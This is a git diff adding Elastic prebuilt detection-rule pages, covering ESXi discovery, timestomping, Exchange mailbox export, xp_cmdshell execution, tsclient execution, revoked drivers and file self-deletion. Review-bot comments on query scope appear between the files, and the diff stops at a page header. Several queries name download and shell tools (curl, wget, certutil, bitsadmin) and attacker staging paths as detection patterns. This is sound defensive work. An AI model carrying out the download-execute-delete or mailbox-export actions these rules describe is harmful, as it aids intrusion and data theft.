diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-esxi-discovery-via-grep.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-esxi-discovery-via-grep.asciidoc new file mode 100644 index 0000000000..21df2bc928 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-esxi-discovery-via-grep.asciidoc 
@@ -0,0 +1,63 @@ +[[prebuilt-rule-8-10-5-esxi-discovery-via-grep]] +=== ESXI Discovery via Grep + +Identifies instances where a process named 'grep', 'egrep', or 'pgrep' is started on a Linux system with arguments related to virtual machine (VM) files, such as "vmdk", "vmx", "vmxf", "vmsd", "vmsn", "vswp", "vmss", "nvram", or "vmem". These file extensions are associated with VM-related file formats, and their presence in grep command arguments may indicate that a threat actor is attempting to search for, analyze, or manipulate VM files on the system. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.bleepingcomputer.com/news/security/massive-esxiargs-ransomware-attack-targets-vmware-esxi-servers-worldwide/ + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Discovery +* Data Source: Elastic Defend + +*Version*: 4 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "linux" and event.type == "start" and event.action == "exec" and +process.name in ("grep", "egrep", "pgrep") and +process.args in ("vmdk", "vmx", "vmxf", "vmsd", "vmsn", "vswp", "vmss", "nvram", "vmem") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Discovery +** ID: TA0007 +** Reference URL: https://attack.mitre.org/tactics/TA0007/ +* Technique: +** Name: Software Discovery +** ID: T1518 +** Reference URL: https://attack.mitre.org/techniques/T1518/ 
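Review bot: in the ESXI Discovery via Grep query, `process.args in ("vmdk", "vmx", ...)` is an exact, case-sensitive match, so only invocations that pass the bare token as a whole argument fire; the description's "arguments related to virtual machine (VM) files" overstates that. Either word the description to say the extension must be the entire argument, or, if broader coverage is intended, use `process.args : ("*vmdk*", ...)` (case-insensitive wildcard) and add a False positive analysis section, since log and config greps would then match too.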
diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-esxi-timestomping-using-touch-command.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-esxi-timestomping-using-touch-command.asciidoc new file mode 100644 index 0000000000..6b65b1585b --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-esxi-timestomping-using-touch-command.asciidoc 
@@ -0,0 +1,66 @@ +[[prebuilt-rule-8-10-5-esxi-timestomping-using-touch-command]] +=== ESXI Timestomping using Touch Command + +Identifies instances where the 'touch' command is executed on a Linux system with the "-r" flag, which is used to modify the timestamp of a file based on another file's timestamp. The rule targets specific VM-related paths, such as "/etc/vmware/", "/usr/lib/vmware/", or "/vmfs/*". These paths are associated with VMware virtualization software, and their presence in the touch command arguments may indicate that a threat actor is attempting to tamper with timestamps of VM-related files and configurations on the system. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.bleepingcomputer.com/news/security/massive-esxiargs-ransomware-attack-targets-vmware-esxi-servers-worldwide/ + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Data Source: Elastic Defend + +*Version*: 4 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "linux" and event.type == "start" and event.action == "exec" and +process.name : "touch" and process.args : "-r" and process.args : ("/etc/vmware/*", "/usr/lib/vmware/*", "/vmfs/*") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Indicator Removal +** ID: T1070 +** Reference URL: https://attack.mitre.org/techniques/T1070/ +* Sub-technique: +** Name: Timestomp +** ID: T1070.006 +** Reference URL: 
https://attack.mitre.org/techniques/T1070/006/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-exchange-mailbox-export-via-powershell.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-exchange-mailbox-export-via-powershell.asciidoc new file mode 100644 index 0000000000..0ecbd15af9 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-exchange-mailbox-export-via-powershell.asciidoc 
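Review bot: the ESXI Timestomping using Touch Command rule is scoped to `process.args : "-r"` only, i.e. copying another file's timestamp; the description should state that scope explicitly rather than describing the flag as "the" way timestamps are modified. Note also that for `touch -r REFERENCE TARGET` the VMware path in `process.args` may be the reference file rather than the target, so the query fires in both directions; that is worth a sentence in a False positive analysis section, which the page currently lacks.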
@@ -0,0 +1,128 @@ +[[prebuilt-rule-8-10-5-exchange-mailbox-export-via-powershell]] +=== Exchange Mailbox Export via PowerShell + +Identifies the use of the Exchange PowerShell cmdlet, New-MailBoxExportRequest, to export the contents of a primary mailbox or archive to a .pst file. Adversaries may target user email to collect sensitive information. + +*Rule type*: query + +*Rule indices*: + +* winlogbeat-* +* logs-windows.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/ +* https://docs.microsoft.com/en-us/powershell/module/exchange/new-mailboxexportrequest?view=exchange-ps +* https://www.elastic.co/security-labs/siestagraph-new-implant-uncovered-in-asean-member-foreign-ministry + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Collection +* Resources: Investigation Guide +* Data Source: PowerShell Logs + +*Version*: 6 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating Exchange Mailbox Export via PowerShell + +The `New-MailBoxExportRequest` cmdlet is used to begin the process of exporting contents of a primary mailbox or archive to a .pst file. Note that this is done on a per-mailbox basis and this cmdlet is available only in on-premises Exchange. +Attackers can abuse this functionality in preparation for exfiltrating contents, which is likely to contain sensitive and strategic data. + +#### Possible investigation steps + +- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures. +- Investigate other alerts associated with the user/host during the past 48 hours. +- Investigate the export operation: + - Identify the user account that performed the action and whether it should perform this kind of action. + - Contact the account owner and confirm whether they are aware of this activity. + - Check if this operation was approved and performed according to the organization's change management policy. + - Retrieve the operation status and use the `Get-MailboxExportRequest` cmdlet to review previous requests. + - By default, no group in Exchange has the privilege to import or export mailboxes. Investigate administrators that assigned the "Mailbox Import Export" privilege for abnormal activity. +- Investigate if there is a significant quantity of export requests in the alert timeframe. This operation is done on a per-mailbox basis and can be part of a mass export. +- If the operation was completed successfully: + - Check if the file is on the path specified in the command. + - Investigate if the file was compressed, archived, or retrieved by the attacker for exfiltration. + +### False positive analysis + +- This mechanism can be used legitimately. Analysts can dismiss the alert if the administrator is aware of the activity and it is done with proper approval. + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- If the involved host is not the Exchange server, isolate the host to prevent further post-compromise behavior. +- Use the `Remove-MailboxExportRequest` cmdlet to remove fully or partially completed export requests. +- Prioritize cases that involve personally identifiable information (PII) or other classified data. 
+- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- Review the privileges of users with the "Mailbox Import Export" privilege to ensure that the least privilege principle is being followed. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +event.category:process and host.os.type:windows and + powershell.file.script_block_text : "New-MailboxExportRequest" and + not ( + file.path : ( + ?\:\\\\Users\\\\*\\\\AppData\\\\Roaming\\\\Microsoft\\\\Exchange\\\\RemotePowerShell\\\\* + ) and file.name:(*.psd1 or *.psm1) + ) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Collection +** ID: TA0009 +** Reference URL: https://attack.mitre.org/tactics/TA0009/ +* Technique: +** Name: Data from Local System +** ID: T1005 +** Reference URL: https://attack.mitre.org/techniques/T1005/ +* Technique: +** Name: Email Collection +** ID: T1114 +** Reference URL: https://attack.mitre.org/techniques/T1114/ +* Sub-technique: +** Name: Local Email Collection +** ID: T1114.001 +** Reference URL: https://attack.mitre.org/techniques/T1114/001/ +* Sub-technique: +** Name: Remote Email Collection +** ID: T1114.002 +** Reference URL: https://attack.mitre.org/techniques/T1114/002/ 
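Review bot: the Exchange Mailbox Export via PowerShell description spells the cmdlet `New-MailBoxExportRequest` while the guide and query use `New-MailboxExportRequest`; align on the latter. The `not (file.path : (...RemotePowerShell...) and file.name:(*.psd1 or *.psm1))` exclusion in the query is undocumented; add a line to the False positive analysis explaining that it suppresses script blocks from the implicit-remoting module files Exchange generates under `Users\*\AppData\Roaming\Microsoft\Exchange\RemotePowerShell\`, which contain the cmdlet name without invoking it, so analysts understand why those paths do not alert.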
diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-execution-via-mssql-xp-cmdshell-stored-procedure.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-execution-via-mssql-xp-cmdshell-stored-procedure.asciidoc new file mode 100644 index 0000000000..0ef15386a0 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-execution-via-mssql-xp-cmdshell-stored-procedure.asciidoc 
@@ -0,0 +1,132 @@ +[[prebuilt-rule-8-10-5-execution-via-mssql-xp-cmdshell-stored-procedure]] +=== Execution via MSSQL xp_cmdshell Stored Procedure + +Identifies execution via MSSQL xp_cmdshell stored procedure. Malicious users may attempt to elevate their privileges by using xp_cmdshell, which is disabled by default, thus, it's important to review the context of it's use. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* +* endgame-* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/ + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Persistence +* Resources: Investigation Guide +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 107 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating Execution via MSSQL xp_cmdshell Stored Procedure + +Microsoft SQL Server (MSSQL) has procedures meant to extend its functionality, the Extended Stored Procedures. These procedures are external functions written in C/C++; some provide interfaces for external programs. This is the case for xp_cmdshell, which spawns a Windows command shell and passes in a string for execution. Attackers can use this to execute commands on the system running the SQL server, commonly to escalate their privileges and establish persistence. + +The xp_cmdshell procedure is disabled by default, but when used, it has the same security context as the MSSQL Server service account, which is often privileged. 
+ +#### Possible investigation steps + +- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures. +- Investigate other alerts associated with the user/host during the past 48 hours. +- Investigate any abnormal account behavior, such as command executions, file creations or modifications, and network connections. +- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes. +- Examine the command line to determine if the command executed is potentially harmful or malicious. +- Inspect the host for suspicious or abnormal behavior in the alert timeframe. + +### False positive analysis + +- This mechanism can be used legitimately, but it brings inherent risk. The security team must monitor any activity of it. If recurrent tasks are being executed using this mechanism, consider adding exceptions — preferably with a full command line. + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved hosts to prevent further post-compromise behavior. +- Remove and block malicious artifacts identified during triage. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- Ensure that SQL servers are not directly exposed to the internet. If there is a business justification for such, use an allowlist to allow only connections from known legitimate sources. +- Disable the xp_cmdshell stored procedure. +- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "windows" and event.type == "start" and process.parent.name : "sqlservr.exe" and + ( + (process.name : "cmd.exe" and + not process.args : ("\\\\*", "diskfree", "rmdir", "mkdir", "dir", "del", "rename", "bcp", "*XMLNAMESPACES*", + "?:\\MSSQL\\Backup\\Jobs\\sql_agent_backup_job.ps1", "K:\\MSSQL\\Backup\\msdb", "K:\\MSSQL\\Backup\\Logins")) or + + (process.name : "vpnbridge.exe" or process.pe.original_file_name : "vpnbridge.exe") or + + (process.name : "certutil.exe" or process.pe.original_file_name == "CertUtil.exe") or + + (process.name : "bitsadmin.exe" or process.pe.original_file_name == "bitsadmin.exe") + ) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Server Software Component +** ID: T1505 +** Reference URL: https://attack.mitre.org/techniques/T1505/ +* Sub-technique: +** Name: SQL Stored Procedures +** ID: T1505.001 +** Reference URL: https://attack.mitre.org/techniques/T1505/001/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: Windows Command Shell +** ID: T1059.003 +** Reference URL: https://attack.mitre.org/techniques/T1059/003/ 
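Review bot: the `not process.args : (...)` list in the Execution via MSSQL xp_cmdshell query bakes deployment-specific paths into a prebuilt rule: `?:\\MSSQL\\Backup\\Jobs\\sql_agent_backup_job.ps1`, `K:\\MSSQL\\Backup\\msdb` and `K:\\MSSQL\\Backup\\Logins` read as one environment's backup jobs and belong in rule exceptions, as the guide itself recommends ("preferably with a full command line"). The bare-verb exclusions (`dir`, `del`, `rename`, `mkdir`, `rmdir`, `diskfree`) also suppress any `cmd.exe` child whose argument list contains that token anywhere, not only housekeeping commands; either tighten them to full command lines or document the trade-off in the False positive analysis.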
diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-execution-via-tsclient-mountpoint.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-execution-via-tsclient-mountpoint.asciidoc new file mode 100644 index 0000000000..cb31d26421 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-execution-via-tsclient-mountpoint.asciidoc 
@@ -0,0 +1,77 @@ +[[prebuilt-rule-8-10-5-execution-via-tsclient-mountpoint]] +=== Execution via TSClient Mountpoint + +Identifies execution from the Remote Desktop Protocol (RDP) shared mountpoint tsclient on the target host. This may indicate a lateral movement attempt. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* +* winlogbeat-* +* logs-windows.* +* endgame-* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://posts.specterops.io/revisiting-remote-desktop-lateral-movement-8fb905cb46c3 + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Lateral Movement +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 106 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "windows" and event.type == "start" and process.executable : "\\Device\\Mup\\tsclient\\*.exe" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Lateral Movement +** ID: TA0008 +** Reference URL: https://attack.mitre.org/tactics/TA0008/ +* Technique: +** Name: Remote Services +** ID: T1021 +** Reference URL: https://attack.mitre.org/techniques/T1021/ +* Sub-technique: +** Name: Remote Desktop Protocol +** ID: T1021.001 +** Reference URL: https://attack.mitre.org/techniques/T1021/001/ 
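Review bot: the Execution via TSClient Mountpoint page has an empty `[source, markdown]` Investigation guide block; for a `high` severity, risk score 73 rule this should be populated (at minimum, that administrators launching tools from their own RDP-redirected drive is the common benign source and that the RDP session's source host should be checked), or the empty block removed so the page does not render a blank guide. The query itself, `process.executable : "\\Device\\Mup\\tsclient\\*.exe"`, is fine.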
diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-expired-or-revoked-driver-loaded.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-expired-or-revoked-driver-loaded.asciidoc new file mode 100644 index 0000000000..722035ad93 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-expired-or-revoked-driver-loaded.asciidoc 
@@ -0,0 +1,75 @@ +[[prebuilt-rule-8-10-5-expired-or-revoked-driver-loaded]] +=== Expired or Revoked Driver Loaded + +Identifies an attempt to load a revoked or expired driver. Adversaries may bring outdated drivers with vulnerabilities to gain code execution in kernel mode or abuse revoked certificates to sign their drivers. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.microsoft.com/en-us/previous-versions/windows/hardware/design/dn653559(v=vs.85)?redirectedfrom=MSDN + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Privilege Escalation +* Tactic: Defense Evasion +* Data Source: Elastic Defend + +*Version*: 3 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +driver where host.os.type == "windows" and process.pid == 4 and + dll.code_signature.status : ("errorExpired", "errorRevoked") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Exploitation for Privilege Escalation +** ID: T1068 +** Reference URL: https://attack.mitre.org/techniques/T1068/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Masquerading +** ID: T1036 +** Reference URL: https://attack.mitre.org/techniques/T1036/ +* Sub-technique: +** Name: Invalid Code Signature +** ID: T1036.001 +** Reference URL: https://attack.mitre.org/techniques/T1036/001/ 
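Review bot: in prebuilt-rule-8-10-5-expired-or-revoked-driver-loaded.asciidoc the query condition `process.pid == 4` is unexplained; PID 4 is the Windows System process, under which kernel driver loads are recorded, so a sentence in the description (or an EQL `/* ... */` comment, as the netcat rule in this patch uses) would stop readers wondering whether the value is a typo. The description also promises coverage of "outdated drivers with vulnerabilities", but the query keys only on `dll.code_signature.status : ("errorExpired", "errorRevoked")`; a vulnerable driver with a valid signature does not match, so narrowing the description to expired or revoked signatures keeps it honest about what the rule detects.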
diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-exporting-exchange-mailbox-via-powershell.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-exporting-exchange-mailbox-via-powershell.asciidoc new file mode 100644 index 0000000000..fef639d1c1 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-exporting-exchange-mailbox-via-powershell.asciidoc 
@@ -0,0 +1,137 @@ +[[prebuilt-rule-8-10-5-exporting-exchange-mailbox-via-powershell]] +=== Exporting Exchange Mailbox via PowerShell + +Identifies the use of the Exchange PowerShell cmdlet, New-MailBoxExportRequest, to export the contents of a primary mailbox or archive to a .pst file. Adversaries may target user email to collect sensitive information. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* +* winlogbeat-* +* logs-windows.* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/ +* https://docs.microsoft.com/en-us/powershell/module/exchange/new-mailboxexportrequest?view=exchange-ps + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Collection +* Tactic: Execution +* Resources: Investigation Guide +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 108 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating Exporting Exchange Mailbox via PowerShell + +Email mailboxes and their information can be valuable assets for attackers. Company mailboxes often contain sensitive information such as login credentials, intellectual property, financial data, and personal information, making them high-value targets for malicious actors. + +The `New-MailBoxExportRequest` cmdlet is used to begin the process of exporting contents of a primary mailbox or archive to a .pst file. Note that this is done on a per-mailbox basis and this cmdlet is available only in on-premises Exchange. 
+ +Attackers can abuse this functionality in preparation for exfiltrating contents, which is likely to contain sensitive and strategic data. + +#### Possible investigation steps + +- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures. +- Investigate other alerts associated with the user/host during the past 48 hours. +- Investigate the export operation: + - Identify the user account that performed the action and whether it should perform this kind of action. + - Contact the account owner and confirm whether they are aware of this activity. + - Check if this operation was approved and performed according to the organization's change management policy. + - Retrieve the operation status and use the `Get-MailboxExportRequest` cmdlet to review previous requests. + - By default, no group in Exchange has the privilege to import or export mailboxes. Investigate administrators that assigned the "Mailbox Import Export" privilege for abnormal activity. +- Investigate if there is a significant quantity of export requests in the alert timeframe. This operation is done on a per-mailbox basis and can be part of a mass export. +- If the operation was completed successfully: + - Check if the file is on the path specified in the command. + - Investigate if the file was compressed, archived, or retrieved by the attacker for exfiltration. + +### False positive analysis + +- This mechanism can be used legitimately. Analysts can dismiss the alert if the administrator is aware of the activity and it is done with proper approval. + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- If the involved host is not the Exchange server, isolate the host to prevent further post-compromise behavior. 
+- Use the `Remove-MailboxExportRequest` cmdlet to remove fully or partially completed export requests. +- Prioritize cases that involve personally identifiable information (PII) or other classified data. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- Review the privileges of users with the "Mailbox Import Export" privilege to ensure that the least privilege principle is being followed. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). 
+---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "windows" and event.type == "start" and + process.name: ("powershell.exe", "pwsh.exe", "powershell_ise.exe") and + process.command_line : ("*MailboxExportRequest*", "*-Mailbox*-ContentFilter*") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Collection +** ID: TA0009 +** Reference URL: https://attack.mitre.org/tactics/TA0009/ +* Technique: +** Name: Data from Local System +** ID: T1005 +** Reference URL: https://attack.mitre.org/techniques/T1005/ +* Technique: +** Name: Email Collection +** ID: T1114 +** Reference URL: https://attack.mitre.org/techniques/T1114/ +* Sub-technique: +** Name: Remote Email Collection +** ID: T1114.002 +** Reference URL: https://attack.mitre.org/techniques/T1114/002/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: PowerShell +** ID: T1059.001 +** Reference URL: https://attack.mitre.org/techniques/T1059/001/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-file-creation-execution-and-self-deletion-in-suspicious-directory.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-file-creation-execution-and-self-deletion-in-suspicious-directory.asciidoc new file mode 100644 index 0000000000..62f7d32673 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-file-creation-execution-and-self-deletion-in-suspicious-directory.asciidoc 
@@ -0,0 +1,72 @@ +[[prebuilt-rule-8-10-5-file-creation-execution-and-self-deletion-in-suspicious-directory]] +=== File Creation, Execution and Self-Deletion in Suspicious Directory + +This rule monitors for the creation of a file, followed by its execution and self-deletion in a short timespan within a directory often used for malicious purposes by threat actors. This behavior is often used by malware to execute malicious code and delete itself to hide its tracks. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Execution +* Data Source: Elastic Defend + +*Version*: 2 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +sequence by host.id, user.id with maxspan=1m + [file where host.os.type == "linux" and event.action == "creation" and + process.name in ("curl", "wget", "fetch", "ftp", "sftp", "scp", "rsync", "ld") and + file.path : ("/dev/shm/*", "/run/shm/*", "/tmp/*", "/var/tmp/*", + "/run/*", "/var/run/*", "/var/www/*", "/proc/*/fd/*")] by file.name + [process where host.os.type == "linux" and event.action == "exec" and event.type == "start" and + process.parent.name in ("bash", "dash", "ash", "sh", "tcsh", "csh", "zsh", "ksh", "fish")] by process.name + [file where host.os.type == "linux" and event.action == "deletion" and not process.name in ("rm", "ld") and + file.path : ("/dev/shm/*", "/run/shm/*", "/tmp/*", "/var/tmp/*", + "/run/*", "/var/run/*", "/var/www/*", "/proc/*/fd/*")] by file.name + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Execution +** 
ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: Unix Shell +** ID: T1059.004 +** Reference URL: https://attack.mitre.org/techniques/T1059/004/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-file-deletion-via-shred.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-file-deletion-via-shred.asciidoc new file mode 100644 index 0000000000..41c9ff4872 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-file-deletion-via-shred.asciidoc 
